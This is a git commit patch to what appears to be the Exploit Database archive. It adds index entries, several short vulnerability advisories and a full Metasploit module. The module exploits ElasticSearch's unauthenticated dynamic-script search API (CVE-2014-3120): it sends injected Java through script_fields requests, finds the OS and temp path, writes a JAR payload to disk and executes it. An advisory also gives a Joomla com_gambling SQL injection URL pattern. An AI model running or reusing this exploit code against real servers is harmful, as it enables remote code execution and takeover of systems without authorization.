From a6e4c236287895740634989584f3e3052abb7061 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 1 Jun 2014 04:36:38 +0000 Subject: [PATCH] Updated 06_01_2014 --- files.csv | 5 + platforms/java/remote/33588.rb | 213 +++++++++++++++++++++++++++++++ platforms/linux/dos/33549.txt | 11 ++ platforms/linux/dos/33585.txt | 11 ++ platforms/php/webapps/33586.txt | 7 + platforms/windows/dos/33587.html | 32 +++++ 6 files changed, 279 insertions(+) create mode 100755 platforms/java/remote/33588.rb create mode 100755 platforms/linux/dos/33549.txt create mode 100755 platforms/linux/dos/33585.txt create mode 100755 platforms/php/webapps/33586.txt create mode 100755 platforms/windows/dos/33587.html diff --git a/files.csv b/files.csv index 48a672db2..b52b011bc 100755 --- a/files.csv +++ b/files.csv @@ -30221,6 +30221,7 @@ id,file,description,date,author,platform,type,port 33546,platforms/php/webapps/33546.txt,"Jokes Complete Website results.php searchingred Parameter XSS",2010-01-18,indoushka,php,webapps,0 33547,platforms/php/webapps/33547.pl,"vBulletin 4.0.1 'misc.php' SQL Injection Vulnerability",2010-01-18,indoushka,php,webapps,0 33548,platforms/php/webapps/33548.txt,"THELIA 1.4.2.1Multiple Cross Site Scripting Vulnerabilities",2010-01-18,EsSandRe,php,webapps,0 +33549,platforms/linux/dos/33549.txt,"OpenOffice 3.1 - '.slk' File NULL Pointer Dereference Remote Denial of Service Vulnerability",2010-01-19,"Hellcode Research",linux,dos,0 33550,platforms/php/webapps/33550.txt,"VisualShapers ezContents <= 2.0.3 Authentication Bypass and Multiple SQL Injection Vulnerabilities",2010-01-19,"AmnPardaz Security Research Team",php,webapps,0 33551,platforms/php/webapps/33551.txt,"PHPMySpace Gold 8.0 'gid' Parameter SQL Injection Vulnerability",2010-01-20,Ctacok,php,webapps,0 33552,platforms/windows/remote/33552.txt,"Microsoft Internet Explorer 8 URI Validation Remote Code Execution Vulnerability",2010-01-21,"Lostmon Lords",windows,remote,0 @@ -30254,3 +30255,7 @@ id,file,description,date,author,platform,type,port 33582,platforms/php/webapps/33582.txt,"Joomla! 'com_rsgallery2' 2.0 Component 'catid' Parameter SQL Injection Vulnerability",2010-01-31,snakespc,php,webapps,0 33583,platforms/hardware/dos/33583.pl,"Xerox WorkCentre PJL Daemon Buffer Overflow Vulnerability",2009-12-31,"Francis Provencher",hardware,dos,0 33584,platforms/multiple/dos/33584.txt,"IBM DB2 'kuddb2' Remote Denial of Service Vulnerability",2010-01-31,"Evgeny Legerov",multiple,dos,0 +33585,platforms/linux/dos/33585.txt,"Linux Kernel 2.6.x 64bit Personality Handling Local Denial of Service Vulnerability",2010-02-01,"Mathias Krause",linux,dos,0 +33586,platforms/php/webapps/33586.txt,"Joomla! 'com_gambling' Component 'gamblingEvent' Parameter SQL Injection Vulnerability",2010-02-01,md.r00t,php,webapps,0 +33587,platforms/windows/dos/33587.html,"Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero",2014-05-30,"Pawel h0wl Wylecial",windows,dos,0 +33588,platforms/java/remote/33588.rb,"ElasticSearch Dynamic Script Arbitrary Java Execution",2014-05-30,metasploit,java,remote,9200 diff --git a/platforms/java/remote/33588.rb b/platforms/java/remote/33588.rb new file mode 100755 index 000000000..799fe0b8d --- /dev/null +++ b/platforms/java/remote/33588.rb @@ -0,0 +1,213 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ElasticSearch Dynamic Script Arbitrary Java Execution', + 'Description' => %q{ + This module exploits a remote command execution vulnerability in ElasticSearch, + exploitable by default on ElasticSearch prior to 1.2.0. The bug is found in the + REST API, which requires no authentication or authorization, where the search + function allows dynamic scripts execution, and can be used for remote attackers + to execute arbitrary Java code. This module has been tested successfully on + ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3. + }, + 'Author' => + [ + 'Alex Brasetvik', # Vulnerability discovery + 'Bouke van der Bijl', # Vulnerability discovery and PoC + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2014-3120'], + ['OSVDB', '106949'], + ['EDB', '33370'], + ['URL', 'http://bouk.co/blog/elasticsearch-rce/'], + ['URL', 'https://www.found.no/foundation/elasticsearch-security/#staying-safe-while-developing-with-elasticsearch'] + ], + 'Platform' => 'java', + 'Arch' => ARCH_JAVA, + 'Targets' => + [ + [ 'ElasticSearch 1.1.1 / Automatic', { } ] + ], + 'DisclosureDate' => 'Dec 09 2013', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(9200), + OptString.new('TARGETURI', [ true, 'The path to the ElasticSearch REST API', "/"]), + OptString.new("WritableDir", [ true, "A directory where we can write files (only for *nix environments)", "/tmp" ]) + ], self.class) + end + + def check + result = Exploit::CheckCode::Safe + + if vulnerable? + result = Exploit::CheckCode::Vulnerable + end + + result + end + + def exploit + print_status("#{peer} - Trying to execute arbitrary Java..") + unless vulnerable? + fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...") + end + + print_status("#{peer} - Asking remote OS...") + res = execute(java_os) + result = parse_result(res) + if result.nil? + fail_with(Failure::Unknown, "#{peer} - Could not get remote OS...") + else + print_good("#{peer} - OS #{result} found") + end + + jar_file = "" + if result =~ /win/i + print_status("#{peer} - Asking TEMP path") + res = execute(java_tmp_dir) + result = parse_result(res) + if result.nil? + fail_with(Failure::Unknown, "#{peer} - Could not get TEMP path...") + else + print_good("#{peer} - TEMP path found on #{result}") + end + jar_file = "#{result}#{rand_text_alpha(3 + rand(4))}.jar" + else + jar_file = File.join(datastore['WritableDir'], "#{rand_text_alpha(3 + rand(4))}.jar") + end + + register_file_for_cleanup(jar_file) + execute(java_payload(jar_file)) + end + + def vulnerable? + addend_one = rand_text_numeric(rand(3) + 1).to_i + addend_two = rand_text_numeric(rand(3) + 1).to_i + sum = addend_one + addend_two + + java = java_sum([addend_one, addend_two]) + res = execute(java) + result = parse_result(res) + + if result.nil? + return false + else + result.to_i == sum + end + end + + def parse_result(res) + unless res && res.code == 200 && res.body + return nil + end + + begin + json = JSON.parse(res.body.to_s) + rescue JSON::ParserError + return nil + end + + begin + result = json['hits']['hits'][0]['fields']['msf_result'][0] + rescue + return nil + end + + result + end + + def java_sum(summands) + source = <<-EOF +#{summands.join(" + ")} + EOF + + source + end + + def to_java_byte_array(str) + buff = "byte[] buf = new byte[#{str.length}];\n" + i = 0 + str.unpack('C*').each do |c| + buff << "buf[#{i}] = #{c};\n" + i = i + 1 + end + + buff + end + + def java_os + "System.getProperty(\"os.name\")" + end + + def java_tmp_dir + "System.getProperty(\"java.io.tmpdir\");" + end + + + def java_payload(file_name) + source = <<-EOF +import java.io.*; +import java.lang.*; +import java.net.*; + +#{to_java_byte_array(payload.encoded_jar.pack)} +File f = new File('#{file_name.gsub(/\\/, "/")}'); +FileOutputStream fs = new FileOutputStream(f); +bs = new BufferedOutputStream(fs); +bs.write(buf); +bs.close(); +bs = null; +URL u = f.toURI().toURL(); +URLClassLoader cl = new URLClassLoader(new java.net.URL[]{u}); +Class c = cl.loadClass('metasploit.Payload'); +c.main(null); + EOF + + source + end + + def execute(java) + payload = { + "size" => 1, + "query" => { + "filtered" => { + "query" => { + "match_all" => {} + } + } + }, + "script_fields" => { + "msf_result" => { + "script" => java + } + } + } + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path.to_s, "_search"), + 'method' => 'POST', + 'data' => JSON.generate(payload) + }) + + return res + end + +end \ No newline at end of file diff --git a/platforms/linux/dos/33549.txt b/platforms/linux/dos/33549.txt new file mode 100755 index 000000000..0711ffe82 --- /dev/null +++ b/platforms/linux/dos/33549.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/37857/info + +OpenOffice is prone to a remote denial-of-service vulnerability caused by a NULL-pointer dereference. + +Attackers can exploit this issue by enticing an unsuspecting victim to open a specially crafted '.slk' file. + +Successful exploits will cause the application to crash, denying service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed. + +OpenOffice 3.1.0 and 3.1.1 are vulnerable; other versions may also be affected. + +http://www.exploit-db.com/sploits/33549.slk \ No newline at end of file diff --git a/platforms/linux/dos/33585.txt b/platforms/linux/dos/33585.txt new file mode 100755 index 000000000..9b5da25e8 --- /dev/null +++ b/platforms/linux/dos/33585.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/38027/info + +The Linux kernel is prone to a local denial-of-service vulnerability. + +Attackers can exploit this issue to cause the affected kernel to crash, denying service to legitimate users. + +Versions prior to Linux kernel 2.6.33-rc6 are vulnerable. + +NOTE: This issue can be exploited only on 64-bit architectures. Core dumps must be enabled. + +http://www.exploit-db.com/sploits/ \ No newline at end of file diff --git a/platforms/php/webapps/33586.txt b/platforms/php/webapps/33586.txt new file mode 100755 index 000000000..1252866b9 --- /dev/null +++ b/platforms/php/webapps/33586.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/38033/info + +The 'com_gambling' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/index.php?option=com_gambling&Itemid=64&task=showGame&gamblingSid=10&gamblingEvent=[Exploit] \ No newline at end of file diff --git a/platforms/windows/dos/33587.html b/platforms/windows/dos/33587.html new file mode 100755 index 000000000..0a4f34384 --- /dev/null +++ b/platforms/windows/dos/33587.html @@ -0,0 +1,32 @@ + + + + + + + \ No newline at end of file